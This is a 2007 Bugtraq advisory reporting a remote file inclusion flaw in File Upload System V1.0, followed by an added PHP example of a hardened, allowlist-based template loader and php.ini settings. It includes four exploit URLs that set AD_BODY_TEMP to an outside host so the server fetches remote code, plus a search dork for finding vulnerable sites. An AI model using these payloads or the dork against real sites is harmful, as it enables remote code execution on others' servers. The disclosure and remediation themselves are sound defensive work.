| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | File Upload System V1.0 (AD_BODY_TEMP) multiple file include |
| From: | ngevedBangetAsli@mbuhyesah.org |
| Date: | 24 Mar 2007 15:07:17 -0000 |
```
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina & jipank
#-----------------------------------------------------------
# Software: File Upload System V1.0
# Script Demo: http://demo.free-php-scripts.net/File_Upload
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew

[[Exploitz]]---------------------------------------------------------
<?php include($AD_BODY_TEMP);?>

exploit :
http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu

gugel dork : intext:"Marsal Design Co."
```
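A hardened counterpart to the `include($AD_BODY_TEMP)` pattern reported above, as an added example that is not part of the original post or the application's own code. It assumes the variable is reachable from the query string, as the reported URLs indicate; the template file names, the `templates/` directory and the `resolve_body_template` helper are hypothetical.

```php
<?php
// Added example, not the application's code. Template names, the
// templates/ directory and this helper are hypothetical.

// Fixed server-side map: template key -> file shipped with the application.
const BODY_TEMPLATES = [
    'contact'     => 'contact_body.php',
    'login'       => 'login_body.php',
    'register'    => 'register_body.php',
    'forgot_pass' => 'forgot_pass_body.php',
];

/**
 * Resolve a template key to an absolute path inside $baseDir.
 * Returns null for anything outside the allowlist (URLs, traversal, arrays).
 */
function resolve_body_template($key, string $baseDir): ?string
{
    if (!is_string($key) || !array_key_exists($key, BODY_TEMPLATES)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    $path = realpath($prefix . BODY_TEMPLATES[$key]);
    // Defence in depth: the file must exist and resolve under $baseDir,
    // so a symlinked or replaced entry cannot point elsewhere.
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Pattern from the advisory, for comparison (value comes from the request):
//   include($AD_BODY_TEMP);

// Hardened use: the script assigns the variable itself before any include,
// so a request parameter of the same name has no effect on what is loaded.
$AD_BODY_TEMP = resolve_body_template('contact', __DIR__ . '/templates');
if ($AD_BODY_TEMP === null) {
    http_response_code(500);
    exit('Template unavailable');
}
include $AD_BODY_TEMP;
```

Independently of the code change, `allow_url_include = Off` in `php.ini` stops `include` from fetching `http://` sources, and `register_globals = Off` (the directive was removed entirely in PHP 5.4) stops request parameters from becoming script variables.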